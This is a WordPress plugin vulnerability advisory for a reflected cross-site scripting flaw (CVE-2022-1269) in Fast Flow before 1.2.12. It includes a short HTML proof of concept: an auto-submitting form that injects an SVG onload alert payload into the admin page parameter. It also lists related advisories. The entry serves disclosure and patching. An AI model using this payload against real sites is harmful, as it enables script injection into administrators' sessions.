Fast Flow < 1.2.12 – Reflected Cross-Site Scripting | CVE 2022-1269 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the page parameter before outputting back in an attribute in an admin dashboard, leading to a Reflected Cross-Site Scripting

Proof of Concept

<form action="https://example.com/wp-admin/admin.php?page=fast-tagger" method="post" name="form1">
   <input type="text" name="page" value='"><svg/onload=alert(/xss/)>'>
  <button type="submit"></button>
</form>
<script>
   document.form1.submit();
</script>

Affects Plugins

fast-flow-dashboard

Fixed in 1.2.12

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

p7e4

Submitter

p7e4

Submitter website

https://github.com/p7e4

Submitter twitter

Verified

Yes

WPVDB ID

65ff0e71-0fcd-4357-9b00-143cb18901bf

Timeline

Publicly Published

2022-04-11 (about 3 years ago)

Added

2022-04-11 (about 3 years ago)

Last Updated

2022-08-12 (about 3 years ago)

Other

Published

Title

Published

2024-11-19

Title

Ortto < 1.0.21 - Reflected Cross-Site Scripting

Published

2021-07-31

Title

WP Dialog <= 1.2.5.5 - Authenticated Stored Cross-Site Scripting

Published

2025-03-18

Title

Snow Storm < 1.4.7 - Admin+ Stored XSS

Published

2023-03-22

Title

InPost Gallery < 2.1.4.2 - Reflected XSS

Published

2025-10-16

Title

Houzez Theme - Functionality < 4.2.0 - Unauthenticated Stored Cross-Site Scripting